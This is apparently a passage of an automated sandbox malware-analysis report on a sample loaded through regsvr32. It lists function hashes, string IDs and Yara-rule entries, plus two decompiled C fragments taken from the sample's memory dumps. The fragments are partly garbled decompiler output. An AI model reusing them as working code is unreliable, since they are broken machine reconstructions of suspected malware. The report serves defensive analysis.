Opcode ID: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
Instruction ID: f828d04dc4844e21020736e096551d72127a7243d3577d4fee6bd43bdef74359
Opcode Fuzzy Hash: 8f9b035c25ddab069e89f1d5b32d9e06551c62a3022c943f576078da68d92037
Instruction Fuzzy Hash: 9141E070508B848BE758DF29C18A41ABBF1FBC9304F500A2DF69A87361C775D845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00739408 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

GSn, xrefs: 00739530

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GSn
API String ID: 0-1733515909
Opcode ID: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
Instruction ID: 86e4d617eaf7a5da61f6f882766fb89a7c690a421d3d6cc135f1ca018dea51c6
Opcode Fuzzy Hash: 120b4183c770ef369911dc760361451600c2e99f203226371e5481c8821bf4d7
Instruction Fuzzy Hash: 9951D6B090038E8FDF48DF64C84A5DE7BB1FB58358F104A1DEC66A6290D3B89664CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00758500 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

8=, xrefs: 00758591

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 8=
API String ID: 0-237953557
Opcode ID: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
Instruction ID: df96b3791e2c5c389720ad290d34c10c612a3b54f6fb3ca5a7f95a3900e45aaa
Opcode Fuzzy Hash: bb623fe5bad30cc0ccc512b27898bb82e9ca0e52d8794c79c7b053a60b518db3
Instruction Fuzzy Hash: 75314930248B458BDB5CDF2CC49922ABAE1FBD9301F444A2EF58AD7365DB74D845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 007420E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

K, xrefs: 0074217C

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: K
API String ID: 0-425913083
Opcode ID: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
Instruction ID: 829fe707bd336df108158ff160501675fe01d40d14c3d92f3f38ec33e969cbe9
Opcode Fuzzy Hash: 2b1ae9da1385bdbe4b8d4d873491c8ef025a73cbd56fa24a9a5b2ec22b63fa4f
Instruction Fuzzy Hash: 6441F7B180438ECFDB48CF68D8864DE7BB0FB58344F114A19F866A6250D3B8D665CF85

Uniqueness

Uniqueness Score: -1.00%

Function 007408CC Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

t", xrefs: 0074092F

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: t"
API String ID: 0-2131657386
Opcode ID: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
Instruction ID: 995776e1f740c07cec4ae203234901a859b454b9e09a11e8fcbc90f6f40fe952
Opcode Fuzzy Hash: a3a222a6e056c70518c09b2f7e5539db3b60aaf61629909d00af61b4973bd0e8
Instruction Fuzzy Hash: 6B41D67190070DCBDF48DF64C48A0DE7FB0FB083A8F656219E81AB6290D3B89585CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00743CD4 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

gLv, xrefs: 00743D74

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: gLv
API String ID: 0-1669999040
Opcode ID: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
Instruction ID: 00f843698d6bd15b24166d174794834e7a95513382a20fd88a7fee1bdca185a0
Opcode Fuzzy Hash: d372408e4ccfa21733394c795309bb98bbbf8ce06b144d4f85a8e8de8872e02b
Instruction Fuzzy Hash: 5A41A0B190078ECFDF84CF64C88A4DE7BB0FB18358F104619F866A6290D3B89665CF95

Uniqueness

Uniqueness Score: -1.00%

Function 007318DC Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

2|, xrefs: 00731938

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2|
API String ID: 0-4112153497
Opcode ID: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
Instruction ID: 28e49b2606238fbad7e8748192c41e0a55e736015bfa8fd81993e6cbaebfc1c2
Opcode Fuzzy Hash: c8d3a13c8ccf64a8a58613b82b71848b75fef30a95d8cbfed718dfac3d203234
Instruction Fuzzy Hash: 7831C3715183808FD768DF28C58A55BBBF1FBD6704F90891DE6CA8A260DB76D849CB03

Uniqueness

Uniqueness Score: -1.00%

Function 00754E8C Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

v)v, xrefs: 00754F79

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: v)v
API String ID: 0-2248367734
Opcode ID: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
Instruction ID: fcf3a8e6d3be087b68122641f46d63e652aac096ad5b75ff9bb58d85bd784286
Opcode Fuzzy Hash: 2bcb51d8d69df24c6edafa72637552a2373937b3983906909be42b2c69647502
Instruction Fuzzy Hash: ED31FFB0D107189BDF88DFB8D98A4DDBBF0BB48308F50822DD816B6290D7785A45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0074A244 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

b, xrefs: 0074A33B

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: b
API String ID: 0-1908338681
Opcode ID: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
Instruction ID: 17bdd88a76ea742b17f3307574b3be47e3e99a9a8e87152f7e628db9e49eb398
Opcode Fuzzy Hash: dddb38d3eca3b718f76d068eb3649ef697cdbcc6fe538854f7f679c62e5ae1f4
Instruction Fuzzy Hash: 09318BB55187808BD748DF28C08651ABBE1BBCC308F404B1DF8CAEB2A1D778D645CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0073D33C Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

Y, xrefs: 0073D348

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Y
API String ID: 0-579211002
Opcode ID: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
Instruction ID: 3905b0f92365bb91672009248d65bd91db3d35b841bf4746a7ab911bc2e22770
Opcode Fuzzy Hash: ecd3080a44302933cb34d055b18508fc771149b61013eb4241d4c9c3597933d5
Instruction Fuzzy Hash: A33199B0628781AFD78CDF28D49692EBBE1BBD9314F816A1DF9868B350D774D404CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00740E2C Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

0}, xrefs: 00740EE2

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0}
API String ID: 0-2955618701
Opcode ID: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
Instruction ID: 3e7e0eca6b7df2cf9e22f590a0720919f810bbceeb8c715e312b2ca61f84fb9a
Opcode Fuzzy Hash: 3bc7749b2bfb2771dde145a478a06cddc01c68d1a6300aeac6f15df74fb2e7de
Instruction Fuzzy Hash: 95319DB052C380AFD388DF28D48591BBBE1BB88354F816A1DF8869A3A0D374D414CB47

Uniqueness

Uniqueness Score: -1.00%

Function 007398AC Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

6N, xrefs: 007399AB

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 6N
API String ID: 0-1503784733
Opcode ID: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
Instruction ID: f4a86dc4653c28cccd562090cb365a0bf87d83b70404bf80af20f8f7627260ee
Opcode Fuzzy Hash: 4950689d9a431a30668e4ae59cbf44894261a06e5f6f244c2bb118cbde227f48
Instruction Fuzzy Hash: 33316CB19087849BD349DF28D44941ABBE1BB9C70CF404B1DF4CAAB394D778DA05CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 007497CC Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

S}, xrefs: 007498C4

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: S}
API String ID: 0-4277866985
Opcode ID: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
Instruction ID: 6eca092c98c3adfaed0121b155035ca3d2c3a6a6fc12d10904b790ccf03c6d1f
Opcode Fuzzy Hash: 4c14e8efe554566b3b6f64fbbe1a0bfeeafcc62cba18a000d9c8f8486cba644e
Instruction Fuzzy Hash: D4317EB0528781AFD398DF28D49A81BBBF1FB88304F806E2DF88687294D775D445CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0074BDA0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

H-, xrefs: 0074BE4D

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: H-
API String ID: 0-1037293833
Opcode ID: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
Instruction ID: b1e2574861916e143dbd51d3dbaf767713271f180177b5759803beb599a6fa44
Opcode Fuzzy Hash: de858980b3a6efa0554d811c46929b7bc76dc3a2dfb78603baf62d4ba3c8ea7f
Instruction Fuzzy Hash: 53215D705083848BD348EF28C45651ABBE1BB8D348F404B1DF9CAAB360D778D654CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 007496D4 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

u*AR, xrefs: 0074978C

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: u*AR
API String ID: 0-611844632
Opcode ID: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
Instruction ID: 3bc00768d5a422eeaaf99635b3aa758fdae31e1bce01374c8fc39a0297de5fdb
Opcode Fuzzy Hash: 336e368621e526daf09679cb3dd942b8565b5edbd5c0d4c2a93cf0215bbbb5a4
Instruction Fuzzy Hash: 203189B050078E8FDB88CF68D85A19F7BA0FB08748F014A19FC2AD6664C7B4D664CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0073DBA0 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

g*`, xrefs: 0073DCA8

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g*`
API String ID: 0-1142845859
Opcode ID: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
Instruction ID: b8aa69d2f49c20b5acb1a00704d8964895f6476ef3bcf62c7f5396d2bf36bea0
Opcode Fuzzy Hash: 9cd48bc6e0482359d29cb13c7700713d9967f760f5c3549705931a0667eb5f41
Instruction Fuzzy Hash: 37217DB4628781AFD388DF28C59A91ABBE1FB89354F806A1DF88687260D774D441CB02

Uniqueness

Uniqueness Score: -1.00%

Function 007392F0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

5$, xrefs: 00739317

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5$
API String ID: 0-3756733592
Opcode ID: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
Instruction ID: e4429aaa6470e4800d38dcddd4cd9cbb61e65e1b626c8151716cae59427da810
Opcode Fuzzy Hash: c6d1b2b01fc7d7aa2c8c76f25d08217fc2c1001ea0874a00b475e29af119845e
Instruction Fuzzy Hash: 4C2127B46087848BD788DF28C05951BBBE0BB8C318F511B1DF4CAA6265D778D645CB4B

Uniqueness

Uniqueness Score: -1.00%

Function 0074A6BC Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

n*=, xrefs: 0074A6F9

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: n*=
API String ID: 0-1578461029
Opcode ID: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
Instruction ID: 5a6e668aa24801d1d9c6f28fa235fe069d2b7f3b57532802ece4870b677a6bb4
Opcode Fuzzy Hash: 6c7163423625a1dfea4e6488f6549c3ec9800c1a3608f349b66670a568836fcf
Instruction Fuzzy Hash: 3F2146B55087848BD359DF28C58A41ABBE0FB8C348F404B6DF4CAA7261D778D605CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000A878 Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0000000118000A878(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x800227e8 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}

0x18000a87c
0x18000a885
0x18000a893

APIs

GetProcessHeap.KERNEL32 ref: 000000018000A87C

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
Instruction ID: b81358a64b4d4ed809fa94cc5bd0f3738e6ada5bf37cc3cf3ffb04c5a8196abe
Opcode Fuzzy Hash: 91d3bf356e17fdc5d0dc73f5f53c12d610db6437279b1ba55c7f6661858add76
Instruction Fuzzy Hash: 44B09230E07A08C2EA8BAB516C8234423A8AB4C740FAA9058900C81330DE2C02ED5710

Uniqueness

Uniqueness Score: -1.00%

Function 0073B258 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
Instruction ID: 4672e6b0faf56747d45931516aa967294410a7dd16cb614359a76f8256564692
Opcode Fuzzy Hash: c1c64cfeeb38086a2dca9a5dc5c7c54d87ec123621af3d0d182b563ac43c41a0
Instruction Fuzzy Hash: E5E1F570E0460ACFDF58DFA8D49A9AFBBB2FB44348F004159D806E72A1D7789A15CBC5

Uniqueness

Uniqueness Score: -1.00%

Function 00731000 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
Instruction ID: fe6ea005f5639c675d9390aaae5e4b5dba9abc438d73e7c7ac0d2e524ff0cb5a
Opcode Fuzzy Hash: f0d7556263b4ac9ce94f5939d6b647cebe0e0421b16219684ecf3aea226e168d
Instruction Fuzzy Hash: AAC1CEB9903609CFDB68CF38C49A59D3BF1AF64308F604119EC269A2A6D774D529CB48

Uniqueness

Uniqueness Score: -1.00%

Function 0074020C Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
Instruction ID: 825b0e9917fd9aad1362f1dfaf5c504e65d1f67d6fe17b1a950adc5dd4fd1115
Opcode Fuzzy Hash: 6356c1b205dd3ea51b6168dff230cd1b04c92b5b79d4cfc048092e65768328f0
Instruction Fuzzy Hash: ACB11771E04B489FDFA8DFA8D48A9DEBBF2FB44344F00451DE846A7290D7B8541ACB85

Uniqueness

Uniqueness Score: -1.00%

Function 0073BA2C Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
Instruction ID: a51721600db0622d8f0cbc348c4c120a5347a080f0533e7dd34b82db6b9d10ba
Opcode Fuzzy Hash: 05221105fcf4a0dfa1600c7ecd9a36b5eab2b73dee02fe6529467e68ba200bce
Instruction Fuzzy Hash: 7FB1F6716087C88FDBBECF24C8892DB7BA9FB45708F504219E9CA8E254DB749744CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0074D770 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
Instruction ID: ee86ddf0d35a64364977b4e1ba27a9762a45e0bf81772b671d5e309e57e315d5
Opcode Fuzzy Hash: 8a1468b82f3cc8c6cef3d943e654abe810b4fd3ed5837763d1554f5f0f2f8fb4
Instruction Fuzzy Hash: 53814B70D08709EFDB58DFA8C49599EBBF1FB44344F40856EE849EB290DB749A09CB81

Uniqueness

Uniqueness Score: -1.00%

Function 007527EC Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
Instruction ID: 83684f45fe9e977b774b6b642a06d97a4ff405ab719fd1c74209ec8d567ee4f0
Opcode Fuzzy Hash: a0216f555e37351bb33d44e999a90ae45b4d35870442341544a959e5100640a4
Instruction Fuzzy Hash: 4081077151074D9BDF88CF28C8C99DD7BB0FB583A8FA56218FC0AA6254D778D885CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00733ABC Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
Instruction ID: 02b20daf93178a026e7f3d7b8144c0123b8c78d7e9ccfd4c8cf6a25771221141
Opcode Fuzzy Hash: 7b26294f0f9f3284694c45c8b9595d0348109ce62e475cb7d6409abe9a76976a
Instruction Fuzzy Hash: 4161217161464C8BEF28DF78D49A2AD3BE1FB44304F20613DEC669B2A2D778D906CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0074E310 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
Instruction ID: d737fb992c4fb93ed735a2887ebe2c03482fa0fa15aff5e16beb0bf84d6cbed1
Opcode Fuzzy Hash: 06da107516d47c143558e8aa98c820ad7c0c85d3c2a152159cfcced41356a87b
Instruction Fuzzy Hash: 9671F870508789CBDBF9CF28D8896DE7BE4FB88704F20461DE9998B2A0DB749645CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007110 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
Instruction ID: 322fdb5d9cbd24f261f2202f975b2bd3e56ab6ee9c72a1ae6d0c4d2aba79015f
Opcode Fuzzy Hash: 24e3c0c76af823433cf272c9c4a9b61f0c82801c6157a6d7b247b40a6cf50061
Instruction Fuzzy Hash: F8411561F66BD947FF43DA7A5812BB00A00AFA77C0E41E312FD0B77B52EB28455A8200

Uniqueness

Uniqueness Score: -1.00%

Function 00732C78 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
Instruction ID: 2bbe0064c7cc50be6dde76902d7839318a93b0d10f6361fc57af4654519b3f9f
Opcode Fuzzy Hash: ab1c614082465e9adf873fcd8bb0e59269149d5aae34c8c546b648bb5ab83c2f
Instruction Fuzzy Hash: 7B51F770518788CBEBBADF34C8992D97BB0FB58304F90861DD84E8E290DB78574ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006818 Relevance: .1, Instructions: 126
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 56%

			E00000001180006818(signed int __edx, void* __edi, void* __esp, long long __rbx, signed long long*** __rcx, long long __rsi) {
				void* _t24;
				int _t26;
				signed int _t51;
				void* _t52;
				signed long long _t66;
				signed long long _t74;
				signed long long _t76;
				signed long long _t77;
				signed int* _t90;
				signed long long _t95;
				signed long long _t96;
				signed long long _t98;
				signed long long _t104;
				long long _t115;
				void* _t117;
				void* _t120;
				signed long long* _t123;
				signed long long _t124;
				signed long long _t126;
				signed long long _t129;
				signed long long*** _t132;

				_t52 = __edi;
				_t51 = __edx;
				 *((long long*)(_t117 + 8)) = __rbx;
				 *((long long*)(_t117 + 0x10)) = _t115;
				 *((long long*)(_t117 + 0x18)) = __rsi;
				_t66 =  *((intOrPtr*)(__rcx));
				_t132 = __rcx;
				_t90 =  *_t66;
				if (_t90 == 0) goto 0x800069ac;
				_t124 =  *0x80021010; // 0xc11a2227b184
				_t111 = _t124 ^  *_t90;
				asm("dec eax");
				_t74 = _t124 ^ _t90[4];
				asm("dec ecx");
				asm("dec eax");
				if ((_t124 ^ _t90[2]) != _t74) goto 0x8000691e;
				_t76 = _t74 - (_t124 ^  *_t90) >> 3;
				_t101 =  >  ? _t66 : _t76;
				_t6 = _t115 + 0x20; // 0x20
				_t102 = ( >  ? _t66 : _t76) + _t76;
				_t103 =  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76;
				if (( ==  ? _t66 : ( >  ? _t66 : _t76) + _t76) - _t76 < 0) goto 0x800068ba;
				_t7 = _t115 + 8; // 0x8
				r8d = _t7;
				E0000000118000A344(_t6, _t76, _t111,  ==  ? _t66 : ( >  ? _t66 : _t76) + _t76, _t111, _t115, _t120);
				_t24 = E0000000118000878C(_t66, _t111);
				if (_t66 != 0) goto 0x800068e2;
				_t104 = _t76 + 4;
				r8d = 8;
				E0000000118000A344(_t24, _t76, _t111, _t104, _t111, _t115, _t120);
				_t129 = _t66;
				_t26 = E0000000118000878C(_t66, _t111);
				if (_t129 == 0) goto 0x800069ac;
				_t123 = _t129 + _t76 * 8;
				_t77 = _t129 + _t104 * 8;
				_t87 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				_t64 =  >  ? _t115 : _t77 - _t123 + 7 >> 3;
				if (( >  ? _t115 : _t77 - _t123 + 7 >> 3) == 0) goto 0x8000691e;
				memset(_t52, _t26, 0 << 0);
				_t126 =  *0x80021010; // 0xc11a2227b184
				r8d = 0x40;
				asm("dec eax");
				 *_t123 =  *(_t132[1]) ^ _t126;
				_t95 =  *0x80021010; // 0xc11a2227b184
				asm("dec eax");
				 *( *( *_t132)) = _t129 ^ _t95;
				_t96 =  *0x80021010; // 0xc11a2227b184
				asm("dec eax");
				( *( *_t132))[1] =  &(_t123[1]) ^ _t96;
				_t98 =  *0x80021010; // 0xc11a2227b184
				r8d = r8d - (_t51 & 0x0000003f);
				asm("dec eax");
				( *( *_t132))[2] = _t77 ^ _t98;
				goto 0x800069af;
				return 0xffffffff;
			}

0x180006818
0x180006818
0x180006818
0x18000681d
0x180006822
0x180006830
0x180006835
0x180006838
0x18000683e
0x180006844
0x180006851
0x18000685a
0x180006864
